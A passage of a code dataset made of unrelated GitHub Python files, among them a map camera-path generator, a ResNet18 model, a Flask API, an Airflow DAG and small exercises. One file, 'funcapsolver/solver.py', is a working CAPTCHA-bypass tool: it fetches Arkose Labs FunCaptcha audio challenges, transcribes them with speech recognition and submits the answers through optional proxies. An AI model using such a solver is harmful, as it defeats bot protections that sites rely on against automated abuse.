goodness_x_prev = 1\n logger.info(\"No previous data point\")\n\n logger.info(\"point: goodness_x: %0.3f goodness_x_prev: %0.3f pretty %s\", goodness_x, goodness_x_prev, [y.pretty for y in x ])\n\n\n def accept_point():\n if goodness_x_prev == 0:\n logger.info(\"Unconditionally accepting since goodness_x_prev is 0\")\n return True\n\n accept = goodness_x / goodness_x_prev\n if accept >= 1:\n logger.info(\"Unconditionally accepting %0.3f\", accept)\n return True\n elif self.rejected_series > 10000:\n # To account for the radius being too large and influence points deeming everything useless\n logger.warn(\"Rejected 10000 points in a row, accepting with 50% probability\")\n return random.choice([True,False])\n else:\n
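 # Metropolis-style acceptance: draw u ~ U(0,1) and accept when u <= accept\n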
 u = random.uniform(0, 1)\n logger.info(\"accept: %0.3f, u: %0.3f\", accept, u)\n\n","repo_name":"Bilalh/Gen","sub_path":"etc/unused_code/mchain/nsampling.py","file_name":"nsampling.py","file_ext":"py","file_size_in_byte":5406,"program_lang":"python","lang":"en","doc_type":"code","stars":1,"dataset":"github-code","pt":"77"} +{"seq_id":"21293235043","text":"#=============================================================================#\r\n# Create Cameras Path 24.05.2019 #\r\n#-----------------------------------------------------------------------------#\r\n# #\r\n# Michael Zwick | Topografischer Fachspezialist | VBS / swisstopo #\r\n# #\r\n#=============================================================================#\r\n\r\nimport os\r\nimport ast\r\nimport math\r\nimport time\r\nimport pickle\r\nimport datetime\r\nimport requests\r\n\r\ntimestamp = datetime.datetime.now().strftime(\"%Y-%m-%d %H:%M:%S\")\r\nprint(timestamp + ' |START| Create Cameras Path')\r\n\r\n\r\n\r\n\r\n# Script parameters\r\nkml = 'line.kml' # None | KML file example: geoadmin.kml\r\npath2D = None # None | list example: [[2600334, 1199351],[2600276, 1199419]] # Marzilibahn\r\nelevation = 700 # None | height\r\npitch = -20 # degree\r\nstep = 2 # meter\r\niteration = 3\r\n\r\ndef string2list(string):\r\n listNew = []\r\n stringNew = string.split('[[')[1].split(']]')[0].split('],[')\r\n for i in range(0,len(stringNew)):\r\n e = float(stringNew[i].split(',')[0])\r\n n = float(stringNew[i].split(',')[1])\r\n listNew.append([e, n])\r\n return listNew\r\n\r\ndef wgs84tolv95(coordWGS84):\r\n url = \"http://geodesy.geo.admin.ch/reframe/wgs84tolv95\"\r\n parameter = {\"easting\": coordWGS84[0],\r\n \"northing\": coordWGS84[1],\r\n \"format\": \"json\"}\r\n response = requests.get(url=url, params=parameter)\r\n result = response.json()\r\n eLV95 = float(result[\"easting\"])\r\n nLV95 = float(result[\"northing\"])\r\n return [eLV95, nLV95]\r\n\r\ndef lv95towgs84(coordLV95):\r\n url = \"http://geodesy.geo.admin.ch/reframe/lv95towgs84\"\r\n parameter = {\"easting\": coordLV95[0],\r\n \"northing\": coordLV95[1],\r\n \"format\": \"json\"}\r\n response = requests.get(url=url, params=parameter)\r\n result = response.json()\r\n eWGS84 = float(result[\"easting\"])\r\n nWGS84 = float(result[\"northing\"])\r\n return [eWGS84, nWGS84]\r\n\r\ndef getDist(point1, point2):\r\n dist = math.sqrt((point2[0]-point1[0])**2 + (point2[1]-point1[1])**2)\r\n return dist\r\n\r\ndef getAzi(point1, point2):\r\n azi = math.atan2((point2[0]-point1[0]), (point2[1]-point1[1]))\r\n return azi\r\n\r\ndef calcPolar(point, azi, dist):\r\n point2 = [point[0] + dist * math.sin(azi), point[1] + dist * math.cos(azi)] \r\n return point2\r\n\r\ndef list2linekml(coordList, CRS):\r\n f = open('path.kml', 'w')\r\n f.write('<kml><Document><Placemark><LineString><coordinates>')\r\n if CRS == 'WGS84':\r\n for i in range(0,len(coordList)):\r\n f.write(str(coordList[i][0]) + ',' + str(coordList[i][1]) + ' ')\r\n elif CRS == 'LV95':\r\n for i in range(0,len(coordList)):\r\n WGS84 = lv95towgs84([coordList[i][0], coordList[i][1]])\r\n f.write(str(WGS84[0]) + ',' + str(WGS84[1]) + ' ')\r\n else:\r\n timestamp = datetime.datetime.now().strftime(\"%Y-%m-%d %H:%M:%S\")\r\n print(timestamp + ' |ERROR| No valid CRS is given')\r\n exit()\r\n f.write('</coordinates></LineString></Placemark></Document></kml>')\r\n f.close()\r\n\r\ndef list2pointskml(coordList, CRS):\r\n f = open('points.kml', 'w')\r\n f.write('<kml><Document>')\r\n if CRS == 'WGS84':\r\n for i in range(0,len(coordList)):\r\n f.write('<Placemark><Point><coordinates>')\r\n f.write(str(coordList[i][0]) + ',' + str(coordList[i][1]))\r\n f.write('</coordinates></Point></Placemark>')\r\n elif CRS == 'LV95':\r\n
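 # LV95 coordinates are reprojected to WGS84 point by point, since KML\r\n # stores WGS84 lon/lat\r\n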
 for i in range(0,len(coordList)):\r\n f.write('<Placemark><Point><coordinates>')\r\n WGS84 = lv95towgs84([coordList[i][0], coordList[i][1]])\r\n f.write(str(WGS84[0]) + ',' + str(WGS84[1]))\r\n f.write('</coordinates></Point></Placemark>')\r\n else:\r\n timestamp = datetime.datetime.now().strftime(\"%Y-%m-%d %H:%M:%S\")\r\n print(timestamp + ' |ERROR| No valid CRS is given')\r\n exit()\r\n f.write('</Document></kml>')\r\n f.close()\r\n\r\ndef path2curve(path2D):\r\n path2Dnew = []\r\n path2Dnew.append(path2D[0])\r\n for i in range(1,len(path2D)-1):\r\n p1 = path2D[i-1]\r\n p2 = path2D[i]\r\n p3 = path2D[i+1]\r\n d1 = getDist(p1,p2)\r\n d2 = getDist(p2,p3)\r\n a1 = getAzi(p2,p1)\r\n a2 = getAzi(p2,p3)\r\n if d1 <= d2:\r\n d = d1\r\n else:\r\n d = d2\r\n path2Dnew.append(calcPolar(p2,a1,d/4.0))\r\n path2Dnew.append(calcPolar(p2,a2,d/4.0))\r\n path2Dnew.append(path2D[-1])\r\n return path2Dnew\r\n\r\ndef dirInterpol(headings):\r\n headingLast = None\r\n headingGroup = []\r\n headingAmount = []\r\n for heading in headings:\r\n if headingLast != heading:\r\n headingLast = heading\r\n headingGroup.append(heading)\r\n count = 1\r\n headingAmount.append(count)\r\n else:\r\n count += 1\r\n headingAmount[-1] = count\r\n\r\n for i in range(0, len(headingGroup)):\r\n if i > 0:\r\n l1 = headingGroup[i-1]\r\n l2 = headingGroup[i]\r\n if abs(l1-l2) > 180:\r\n if l1 < l2:\r\n headingGroup[i] = l2-360\r\n elif l1 > l2:\r\n headingGroup[i] = l2+360\r\n \r\n headings = []\r\n lenInterpolLast = 0\r\n for i in range(0, len(headingGroup)):\r\n if i < len(headingGroup)-1:\r\n l1 = headingAmount[i]\r\n l2 = headingAmount[i+1]\r\n if l1 <= l2:\r\n lenInterpol = int(l1/2)\r\n else:\r\n lenInterpol = int(l2/2)\r\n if lenInterpol != 0:\r\n stepInterpol = (headingGroup[i+1]-headingGroup[i])/(lenInterpol*2+1)\r\n else:\r\n stepInterpol = 0\r\n for j in range (lenInterpolLast, headingAmount[i]-lenInterpol):\r\n headings.append(headingGroup[i])\r\n for k in range (0, lenInterpol * 2):\r\n headings.append(headingGroup[i] + (k+1) * stepInterpol)\r\n lenInterpolLast = lenInterpol\r\n else:\r\n for l in range (0, headingAmount[i]-lenInterpol):\r\n headings.append(headingGroup[-1])\r\n return headings\r\n\r\n\r\n\r\n\r\n# Loading path\r\nif kml != None:\r\n with open(kml, 'r') as fp:\r\n fileLine = fp.readline()\r\n if fileLine.find('<coordinates>'):\r\n try:\r\n coordinates = fileLine.split('<coordinates>')[1].split('</coordinates>')[0]\r\n except:\r\n timestamp = datetime.datetime.now().strftime(\"%Y-%m-%d %H:%M:%S\")\r\n print(timestamp + ' |ERROR| Wrong KML. 
Digitize on www.map.geo.admin.ch.')\r\n path2D = []\r\n for p in coordinates.split(' '):\r\n c = p.split(',')\r\n path2D.append(wgs84tolv95([float(c[0]),float(c[1])]))\r\n timestamp = datetime.datetime.now().strftime(\"%Y-%m-%d %H:%M:%S\")\r\n print(timestamp + ' |INFO | KML interpreted')\r\nelse:\r\n timestamp = datetime.datetime.now().strftime(\"%Y-%m-%d %H:%M:%S\")\r\n print(timestamp + ' |INFO | Path2D interpreted')\r\n\r\n\r\n\r\n\r\n# Smoothing path\r\nfor i in range(0,iteration):\r\n path2D = path2curve(path2D)\r\nlist2linekml(path2D, 'LV95')\r\n\r\ntimestamp = datetime.datetime.now().strftime(\"%Y-%m-%d %H:%M:%S\")\r\nprint(timestamp + ' |INFO | Smoothing path done')\r\n\r\n\r\n\r\n\r\n# Calculating camera positions in WGS84\r\npositions = []\r\nheadings = []\r\nelevations = []\r\npitches = []\r\nmode = 'Path'\r\n\r\noffset = 0\r\nfor i in range (0, len(path2D)-1):\r\n dist = offset\r\n eStart = path2D[i][0]\r\n nStart = path2D[i][1]\r\n eEnd = path2D[i+1][0]\r\n nEnd = path2D[i+1][1]\r\n azimut = math.atan2((eEnd - eStart), (nEnd - nStart))\r\n distTotal = math.sqrt((eEnd - eStart)**2 + (nEnd - nStart)**2)\r\n\r\n while dist < distTotal:\r\n eLV95 = eStart + dist * math.sin(azimut)\r\n nLV95 = nStart + dist * math.cos(azimut)\r\n dist += step\r\n position = lv95towgs84([eLV95, nLV95])\r\n heading = azimut / math.pi * 180\r\n if elevation != None:\r\n elevations.append(elevation)\r\n else:\r\n if elevToTerrain != None:\r\n elevations.append(coord2height([eLV95, nLV95]) + elevToTerrain)\r\n\r\n positions.append(position)\r\n if heading < 0:\r\n headings.append(heading+360.0)\r\n else:\r\n headings.append(heading)\r\n pitches.append(pitch)\r\n\r\n offset = dist - distTotal\r\n\r\nheadings = dirInterpol(headings)\r\nlist2pointskml(positions, 'WGS84')\r\ntimestamp = datetime.datetime.now().strftime(\"%Y-%m-%d %H:%M:%S\")\r\nprint(timestamp + ' |INFO | Calculating ' + str(len(headings)) + ' camera positions done')\r\n\r\n\r\n\r\n\r\n# Save the camera parameters in a file\r\nfile = open('cameras.pkl', 'wb')\r\npickle.dump(positions, file)\r\npickle.dump(headings, file)\r\npickle.dump(elevations, file)\r\npickle.dump(pitches, file)\r\npickle.dump(mode, file)\r\nfile.close()\r\n\r\ntimestamp = datetime.datetime.now().strftime(\"%Y-%m-%d %H:%M:%S\")\r\nprint(timestamp + ' |END | Create Cameras Path')\r\n","repo_name":"michaelzwick/MapGeoAdmin_Video","sub_path":"CreateCameras_Path.py","file_name":"CreateCameras_Path.py","file_ext":"py","file_size_in_byte":9318,"program_lang":"python","lang":"en","doc_type":"code","stars":5,"dataset":"github-code","pt":"77"} +{"seq_id":"30348727296","text":"import tensorflow as tf\nfrom tensorflow.keras.models import Model\nfrom src.tf.models.resnet import ResNetMulticlassClassifier\nfrom tensorflow.keras.layers import Conv2D, BatchNormalization, Activation, Input, \\\n AveragePooling2D, Flatten, ZeroPadding2D, Add, MaxPool2D, Dense, Dropout\n\n\n\"\"\"\nThe customized ResNet implementation found in the demo:\nhttps://www.analyticsvidhya.com/blog/2021/08/how-to-code-your-resnet-from-scratch-in-tensorflow/\n\"\"\"\nclass ResNet18(ResNetMulticlassClassifier):\n\n def __init__(self, *args, **kwargs):\n super().__init__(*args, **kwargs)\n\n\n def get_identity_block(self, x, filter, kernel=(3, 3)):\n x2 = Conv2D(filter, kernel, padding=\"same\")(x)\n x2 = BatchNormalization(axis=3)(x2)\n x2 = Activation(\"relu\")(x2)\n x2 = Conv2D(filter, kernel, padding=\"same\")(x2)\n x2 = BatchNormalization(axis=3)(x2)\n x3 = Add()([x2, x])\n x3 = Activation(\"relu\")(x3)\n\n 
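 # the Add() above forms the residual shortcut y = F(x) + x; ReLU is applied\n # after the addition, as in the original ResNet formulation\n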
return x3\n\n\n def get_conv_block(self, x, filter, kernel=(3, 3), strides=(2, 2)):\n x2 = Conv2D(filter, kernel, padding=\"same\", strides=strides)(x)\n x2 = BatchNormalization(axis=3)(x2)\n x2 = Activation(\"relu\")(x2)\n x2 = Conv2D(filter, kernel, padding=\"same\")(x2)\n x2 = BatchNormalization(axis=3)(x2)\n x3 = Conv2D(filter, (1, 1), strides=strides)(x)\n x4 = Add()([x2, x3])\n x4 = Activation(\"relu\")(x4)\n\n return x4\n\n\n def build(self):\n input = Input(self.input_shape)\n x = ZeroPadding2D((3, 3))(input)\n x = Conv2D(64, 7, strides=2, padding=\"same\")(x)\n x = BatchNormalization()(x)\n x = Activation(\"relu\")(x)\n x = MaxPool2D(3, strides=2, padding=\"same\")(x)\n block_layers = [3, 6]\n filter_size = 64\n\n for i in range(2):\n if i == 0:\n for j in range(block_layers[i]):\n x = self.get_identity_block(x, filter=filter_size)\n else:\n filter_size = filter_size * 2\n x = self.get_conv_block(x, filter=filter_size)\n for j in range(block_layers[i] - 1):\n x = self.get_identity_block(x, filter=filter_size)\n\n x = AveragePooling2D(pool_size=(2, 2), padding=\"same\")(x)\n x = Flatten(name=\"flatten\")(x)\n x = Dense(512, activation=\"relu\")(x)\n x = Dropout(0.2)(x)\n x = Dense(self.classes_num, activation=\"softmax\")(x)\n self.model = Model(inputs=input, outputs=x, name='Resnet18')\n self.model.summary()\n\n\nif __name__ == \"__main__\":\n resnet = ResNet18(classes_num=2)\n resnet.build()\n resnet.train(images_dir=r\"D:\\op\\datasets\\v5_structured\")","repo_name":"unicef/Sudan-school-mapping-AI_models","sub_path":"src/tf/models/resnet18.py","file_name":"resnet18.py","file_ext":"py","file_size_in_byte":2670,"program_lang":"python","lang":"en","doc_type":"code","stars":2,"dataset":"github-code","pt":"77"} +{"seq_id":"42100893383","text":"from . 
import ot_nym\nfrom flask import Blueprint, jsonify, request\n\nmod_nym = Blueprint('nym', __name__, template_folder='templates')\n\n\n@mod_nym.route('/nyms', methods=['GET'])\ndef nym_get_all():\n nyms = ot_nym.get_all()\n\n return jsonify(nyms), 200\n\n\n@mod_nym.route('/nyms/', methods=['GET'])\ndef nym_get_info(id):\n nym = ot_nym.get_nym_info(id)\n\n return jsonify(nym), 200\n\n\n@mod_nym.route('/nyms', methods=['POST'])\ndef nym_post():\n nym = ot_nym.create()\n\n if 'error' in nym:\n return jsonify(nym), 500\n\n if 'name' in request.json:\n result = ot_nym.set_name(nym['nym'], request.json['name'])\n\n statusCode = 500 if 'error' in result else 200\n\n return jsonify(result), statusCode\n\n return jsonify(nym), 200\n\n\n@mod_nym.route('/nym//register/', methods=['POST'])\ndef nym_register(nym, server):\n result = ot_nym.register(nym, server)\n\n statusCode = 500 if 'error' in result else 200\n\n return jsonify(result), statusCode\n\n\n@mod_nym.route('/nyms//name/', methods=['POST'])\ndef nym_name_post(nym, name):\n result = ot_nym.set_name(nym, name)\n\n statusCode = 500 if 'error' in result else 200\n\n return jsonify(result), statusCode\n\n\n@mod_nym.route('/nyms/count', methods=['GET'])\ndef nym_count():\n count = ot_nym.count()\n\n statusCode = 500 if 'error' in count else 200\n\n return jsonify(count), statusCode\n\n\n@mod_nym.route('/nyms//outgoing/', methods=['GET'])\ndef nym_outgoing(id, serverId):\n outgoing = ot_nym.outgoing(id)\n\n statusCode = 400 if 'error' in outgoing else 200\n\n return jsonify(outgoing), statusCode\n\n\n@mod_nym.route('/nyms//incoming/', methods=['GET'])\ndef nym_incoming(id, serverId):\n incoming = ot_nym.incoming(id, serverId)\n\n statusCode = 400 if 'error' in incoming else 200\n\n return jsonify(incoming), statusCode","repo_name":"klzns/opentracks","sub_path":"app/resources/nym/api_nym.py","file_name":"api_nym.py","file_ext":"py","file_size_in_byte":1934,"program_lang":"python","lang":"en","doc_type":"code","stars":6,"dataset":"github-code","pt":"77"} +{"seq_id":"4678334371","text":"import speech_recognition as sr\nimport requests\nimport random\nimport string \nimport time\nimport os\n\nclass funcapsolver():\n\tdef get_token(host, pkey, proxy=None):\n\t\tif proxy == None:\n\t\t\treturn requests.post(f'https://client-api.arkoselabs.com/fc/gt2/public_key/{pkey}', data={'bda': '','public_key': pkey,'site': host,'userbrowser': 'Mozilla/5.0 (Windows NT 10.0; Win64; x64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/86.0.4240.75 Safari/537.36','rnd': f'0.{random.choice(\"12334565789\")}'}).json()['token']\n\t\telse:\n\t\t\treturn requests.post(f'https://client-api.arkoselabs.com/fc/gt2/public_key/{pkey}', proxies={'all://': proxy}, data={'bda': '','public_key': pkey,'site': host,'userbrowser': 'Mozilla/5.0 (Windows NT 10.0; Win64; x64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/86.0.4240.75 Safari/537.36','rnd': f'0.{random.choice(\"12334565789\")}'}).json()['token']\n\n\tdef recognizeAudio(audiofilename):\n\t\trecognize = sr.Recognizer()\n\t\twith sr.AudioFile(audiofilename + '.wav') as s:\n\t\t\tdata = recognize.record(s)\n\t\t\traw = recognize.recognize_google(data)\n\t\t\tanswer = ''\n\t\t\tfor char in raw:\n\t\t\t\tif char.isdigit():\n\t\t\t\t\tanswer += char\n\t\t\treturn answer\n\n\tdef solveCaptcha(token, proxy=None):\n\t\tsession_token = token.split('|')[0]\n\t\tif proxy == None:\n\t\t\tgetcaptchaAudio = 
requests.get(f'https://client-api.arkoselabs.com/fc/get_audio/?session_token={session_token}&analytics_tier=40&r=us-east-1&game=1&language=en')\n\t\telse:\n\t\t\tgetcaptchaAudio = requests.get(f'https://client-api.arkoselabs.com/fc/get_audio/?session_token={session_token}&analytics_tier=40&r=us-east-1&game=1&language=en', proxies={\"all://\": proxy})\n\t\taudiornd = ''.join(random.choices(string.ascii_uppercase + string.digits, k = 7)) \n\t\topen(rf\"{os.getcwd()}\\audios\\{audiornd}\" + '.wav', 'wb+').write(getcaptchaAudio.content)\n\n\t\tattemptSolve = requests.post('https://client-api.arkoselabs.com/fc/audio/', proxies={\"all://\": proxy} if proxy else None,\n\t\theaders = {\n\t\t\t'authority': 'client-api.arkoselabs.com',\n\t\t\t'accept': '*/*',\n\t\t\t'cache-control': 'no-cache',\n\t\t\t'x-newrelic-timestamp': str(round(time.time())),\n\t\t\t'x-requested-with': 'XMLHttpRequest',\n\t\t\t'user-agent': 'Mozilla/5.0 (Windows NT 10.0; Win64; x64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/86.0.4240.75 Safari/537.36',\n\t\t\t'content-type': 'application/x-www-form-urlencoded',\n\t\t\t'origin': 'https://client-api.arkoselabs.com',\n\t\t\t'sec-fetch-site': 'same-origin',\n\t\t\t'sec-fetch-mode': 'cors',\n\t\t\t'sec-fetch-dest': 'empty',\n\t\t\t'accept-language': 'en-US,en;q=0.9'\n\t\t},\n\t\tdata = {\n\t\t\t'session_token': session_token,\n\t\t\t'language': 'en',\n\t\t\t'r': 'us-east-1',\n\t\t\t'audio_type': '2',\n\t\t\t'response': funcapsolver.recognizeAudio(rf\"{os.getcwd()}\\audios\\{audiornd}\"),\n\t\t\t'analytics_tier': '40'\n\t\t})\n\t\ttry:\n\t\t\tif attemptSolve.json()['response'] == 'correct':\n\t\t\t\treturn attemptSolve.json()\n\t\t\telse:\n\t\t\t\treturn False\n\t\texcept KeyError as key:\n\t\t\treturn key, False\n","repo_name":"acierp/funcapsolver","sub_path":"funcapsolver/solver.py","file_name":"solver.py","file_ext":"py","file_size_in_byte":2924,"program_lang":"python","lang":"en","doc_type":"code","stars":8,"dataset":"github-code","pt":"77"} +{"seq_id":"10134700776","text":"\"\"\"\nRead file into texts and calls.\nIt's ok if you don't understand how to read files\n\"\"\"\nimport csv\nwith open('texts.csv', 'r') as f:\n reader = csv.reader(f)\n texts = list(reader)\n\nwith open('calls.csv', 'r') as f:\n reader = csv.reader(f)\n calls = list(reader)\n\n\"\"\"\nTASK 2: Which telephone number spent the longest time on the phone\nduring the period? 
Don't forget that time spent answering a call is\nalso time spent on the phone.\nPrint a message:\n\"<telephone number> spent the longest time, <total time> seconds, on the phone during \nSeptember 2016.\".\n\"\"\"\n\n# Dictionary with the time spent on the phone for each number.\ntime_spent_phone = {}\n\nfor call in calls:\n caller, receiver, start_time, duration = call\n # Save the time spent on the phone for the caller and the receiver\n time_spent_phone[caller] = time_spent_phone.get(caller, 0) + int(duration)\n time_spent_phone[receiver] = time_spent_phone.get(receiver, 0) + int(duration)\n\n# Get the key for the maximum value on time_spent_phone\nphone_longest_time = max(time_spent_phone, key = time_spent_phone.get)\n\nmessage = \"{} spent the longest time, {} seconds, on the phone during September 2016.\"\nprint(message.format(phone_longest_time, time_spent_phone[phone_longest_time]))\n","repo_name":"Serafabr/udacity-data_structure_and_algorithms","sub_path":"projects/project 01 - unscramble computer science problems/Task2.py","file_name":"Task2.py","file_ext":"py","file_size_in_byte":1255,"program_lang":"python","lang":"en","doc_type":"code","stars":0,"dataset":"github-code","pt":"77"} +{"seq_id":"27377251080","text":"def kruskal(g):\n # (w,u,v) \n # -- w - weight of edge\n # -- u - vertex already visited\n # -- v - vertex going to\n edges = sorted([(w,u,v) for u in range(len(g)) for (v,w) in g[u]])\n sets = [{v} for v in range(len(g))]\n # for every v, v in s[v]\n s = list(range(len(g)))\n\n mst = []\n\n for (w,u,v) in edges:\n if u not in sets[s[v]]:\n sets[s[u]] |= sets[s[v]]\n for x in sets[s[v]]:\n s[x] = s[u]\n mst.append((u,v))\n return mst","repo_name":"theorowlett/CS350","sub_path":"Lecture 13/kruskals.py","file_name":"kruskals.py","file_ext":"py","file_size_in_byte":505,"program_lang":"python","lang":"en","doc_type":"code","stars":0,"dataset":"github-code","pt":"77"} +{"seq_id":"41385721913","text":"import subprocess as sp\nimport time\nimport sys\n\nif len(sys.argv) != 3:\n print(\"USAGE : python test.py from to\")\n sys.exit(1)\nfrom_ = int(sys.argv[1])\nto_ = int(sys.argv[2])\n\nsp.run([\"rm\",\"/home/slahmer/cblass/cblas/CBLAS/examples/test_.c\"])\n\n\nfor i in range(from_,to_+1):\n proc1 = sp.run([\"./_test.sh\",\"{}\".format(i)])\n if proc1.returncode != 0:\n print(\"test {} failed\".format(i))\n continue\n time.sleep(1)\n proc2 = sp.run([\"./_validate.sh\",\"{}\".format(i)])\n if proc2.returncode == 0:\n print(\"test {} passed\".format(i))\n else:\n print(\"test {} failed\".format(i))\n sp.run([\"rm\",\"/home/slahmer/cblass/cblas/CBLAS/examples/test_.c\"])\n sp.run([\"rm\",\"/tmp/first{}.log\".format(i)])\n sp.run([\"rm\",\"/tmp/second{}.log\".format(i)])\n","repo_name":"slahmer97/BLASter","sub_path":"test_sources/global_tests/test_with_optimization/my_test.py","file_name":"my_test.py","file_ext":"py","file_size_in_byte":782,"program_lang":"python","lang":"en","doc_type":"code","stars":1,"dataset":"github-code","pt":"77"} +{"seq_id":"34950526436","text":"import numpy as np\nimport pandas as pd\n\n\ndef prepare_data(start_year, end_year, pct_train):\n years = np.arange(start_year, end_year + 1)\n time = years - 1900\n d = 100 * (2.4) ** time + np.random.normal(0, 1, len(time))\n d_0 = np.array([100] * len(time))\n\n log_d = np.log(d)\n\n train_size = int(pct_train * len(time))\n train_time = time[:train_size]\n test_time = time[train_size:]\n train_log_d = log_d[:train_size]\n test_log_d = log_d[train_size:]\n\n return train_time, test_time, train_log_d, test_log_d\n
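\nif __name__ == \"__main__\":\n # illustrative usage sketch (hypothetical; assumes scikit-learn is available):\n # a log-linear fit should recover slope ~ log(2.4) and intercept ~ log(100),\n # since log_d = log(100) + time * log(2.4) + (negligible) noise\n from sklearn.linear_model import LinearRegression\n tr_t, te_t, tr_y, te_y = prepare_data(1950, 2000, 0.8)\n model = LinearRegression().fit(tr_t.reshape(-1, 1), tr_y)\n print(\"slope:\", model.coef_[0], \"intercept:\", model.intercept_)\n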
","repo_name":"ashwin-2309/ml-lab","sub_path":"assignment 3 dorona/final code/data_preparation.py","file_name":"data_preparation.py","file_ext":"py","file_size_in_byte":535,"program_lang":"python","lang":"en","doc_type":"code","stars":0,"dataset":"github-code","pt":"77"} +{"seq_id":"32943896773","text":"\"\"\"Information parsing.\r\n\r\n1. Parse the type from the title; raise an error if it does not match.\r\n2. Extract name, module_name, pypi_name; raise an error if they do not match.\r\n3. Check pypi_name on the PyPI site; raise an error if it does not exist.\r\n\"\"\"\r\nfrom __future__ import annotations\r\n\r\nimport os\r\nimport re\r\nfrom typing import Any\r\n\r\nfrom utils import PyPi, set_action_outputs\r\n\r\n\r\ndef parse_title(title: str) -> dict[str, Any]:\r\n \"\"\"Parse the title.\"\"\"\r\n pattern = r\"\\[(plugin|adapter|bot)\\]:\\s*(.+)\"\r\n match = re.match(pattern, title)\r\n if match:\r\n return {\"type\": match.group(1), \"name\": match.group(2)}\r\n msg = \"Invalid title format\"\r\n raise ValueError(msg)\r\n\r\n\r\nif __name__ == \"__main__\":\r\n title = os.environ[\"TITLE\"]\r\n pypi_name = os.environ[\"PYPI_NAME\"]\r\n try:\r\n PyPi(pypi_name).check_pypi()\r\n parsed = parse_title(title)\r\n set_action_outputs(\r\n {\r\n \"result\": \"success\",\r\n \"output\": \"\",\r\n \"type\": parsed.get(\"type\", \"\"),\r\n \"name\": parsed.get(\"name\", \"\"),\r\n }\r\n )\r\n except ValueError as e:\r\n set_action_outputs({\"result\": \"error\", \"output\": str(e)})\r\n","repo_name":"MarleneJiang/issue-ops","sub_path":".github/actions_scripts/parse.py","file_name":"parse.py","file_ext":"py","file_size_in_byte":1177,"program_lang":"python","lang":"zh","doc_type":"code","stars":1,"dataset":"github-code","pt":"77"} +{"seq_id":"26104859489","text":"# Food Truck Profit Prediction Tool\r\n\r\nimport pandas as pd \r\n#import numpy as np\r\nfrom sklearn.linear_model import LinearRegression\r\n#from sklearn.model_selection import train_test_split \r\n\r\ndataset = pd.read_csv('Foodtruck.csv')\r\n\r\nfeatures = dataset.iloc[:, :-1].values \r\nlabels = dataset.iloc[:, 1].values \r\n\r\n#features_train, features_test, labels_train, labels_test = train_test_split(features, labels, test_size=0.2, random_state=0)\r\n\r\nregressor = LinearRegression() \r\nregressor.fit(features, labels)\r\n\r\n\r\n#labels_pred = regressor.predict(features_test) \r\n\r\n#df = pd.DataFrame({'Actual': labels_test, 'Predicted': labels_pred})\r\n\r\nprofit = regressor.predict([[3.5]]) # predict expects a 2-D array of samples\r\nprint(profit[0])","repo_name":"pulkitmathur10/FSBC2019","sub_path":"Day 16/Foodtruck.py","file_name":"Foodtruck.py","file_ext":"py","file_size_in_byte":666,"program_lang":"python","lang":"en","doc_type":"code","stars":0,"dataset":"github-code","pt":"77"} +{"seq_id":"29477094673","text":"\"\"\"\nLESSON 5\nDEVELOPING YOUR OWN PLUGINS\n\"\"\"\n\nfrom airflow import DAG\nfrom airflow.utils.dates import days_ago\nfrom airflow.hooks.postgres_hook import PostgresHook\nfrom airflow.operators.python_operator import PythonOperator\nfrom y_niyazbayev_plugins.y_niyazbyaev_ram_operators import YerzhanRamTop3LocationOperator\n\nimport logging\n\n\nurl = \"https://rickandmortyapi.com/api/location\"\n\nDEFAULT_ARGS = {\n 'owner': 'y_niyazbayev',\n 'depends_on_past': False,\n 'start_date': days_ago(1),\n 'poke_interval': 600\n}\n\ndef load_to_db(**kwargs):\n ti = kwargs['ti']\n locations_list = ti.xcom_pull(task_ids='get_top3_locations')\n logging.info(f'locations_list: {locations_list}')\n\n pg_hook = PostgresHook(postgres_conn_id='conn_greenplum_write')\n conn = pg_hook.get_conn()\n cursor = conn.cursor()\n logging.info('Creating table')\n # the DDL below mirrors the 5-tuples pulled from XCom:\n # (id, name, type, dimension, resident_cnt)\n cursor.execute(\"CREATE TABLE IF NOT EXISTS {}\"\n \"(id integer, \"\n \"name character varying(50), \"\n \"type character varying(50), \"\n \"dimension character varying(50), \"\n \"resident_cnt integer);\"\n .format('y_niyazbayev_ram_location'))\n logging.info('Truncating table')\n cursor.execute(f'TRUNCATE TABLE y_niyazbayev_ram_location;')\n logging.info('Inserting rows')\n for location in locations_list:\n cursor.execute(\n \"INSERT INTO y_niyazbayev_ram_location VALUES(%s, %s, %s, %s, %s);\",\n (location[0], location[1], location[2], location[3], location[4])\n )\n conn.commit()\n logging.info('db updated')\n\n\nwith DAG(\"y_niyazbayev_homework_5\",\n schedule_interval='@daily',\n catchup=True,\n default_args=DEFAULT_ARGS,\n max_active_runs=1,\n tags=['y_niyazbayev']\n ) as dag:\n\n get_top3_locations = YerzhanRamTop3LocationOperator(\n task_id='get_top3_locations',\n url=url\n )\n\n load_locations_to_db = PythonOperator(\n task_id='load_locations_to_db',\n python_callable=load_to_db\n )\n\nget_top3_locations >> load_locations_to_db\n","repo_name":"skarfex/education.courses_data_engineer","sub_path":"karpov_airflow_fullrep/dags/y-niyazbayev/y-niyazbayev_homework_5.py","file_name":"y-niyazbayev_homework_5.py","file_ext":"py","file_size_in_byte":2126,"program_lang":"python","lang":"en","doc_type":"code","stars":0,"dataset":"github-code","pt":"77"} +{"seq_id":"71448803769","text":"#!/usr/bin/python\n# -*- coding: utf-8 -*-\n\nimport kafka\nimport os\nfrom one_page_scraping import one_page_scraping\nfrom dotenv import load_dotenv\n\nload_dotenv()\nKAFKA_HOST = os.getenv('KAFKA_HOST')\nKAFKA_PORT = os.getenv('KAFKA_PORT')\n\nwhich_partition = 0 #os.environ.get('PARTITION')\nwhich_topic = 'test' #os.environ.get('TOPIC')\n\nconsumer = kafka.KafkaConsumer(\n bootstrap_servers=[f'{KAFKA_HOST}:{KAFKA_PORT}'],\n auto_offset_reset='latest',\n enable_auto_commit=True,\n group_id='my-group',\n value_deserializer=lambda x: x.decode('utf-8'))\n\npartition = kafka.TopicPartition(topic=which_topic, partition=int(which_partition))\nconsumer.assign([partition])\n\nprint(f'topicname : {which_topic}, partitions : {consumer.partitions_for_topic(which_topic)}')\nprint(f'target : {consumer.assignment()}')\n\nprint(f'Start consuming ...\\n')\n\nfor record in consumer:\n message = record.value\n print('get message :', message)\n try:\n url = message.split('|')[0]\n ts = message.split('|')[1]\n page = message.split('|')[2]\n one_page_scraping(url, ts, page)\n except IndexError:\n print('got wrong message . 
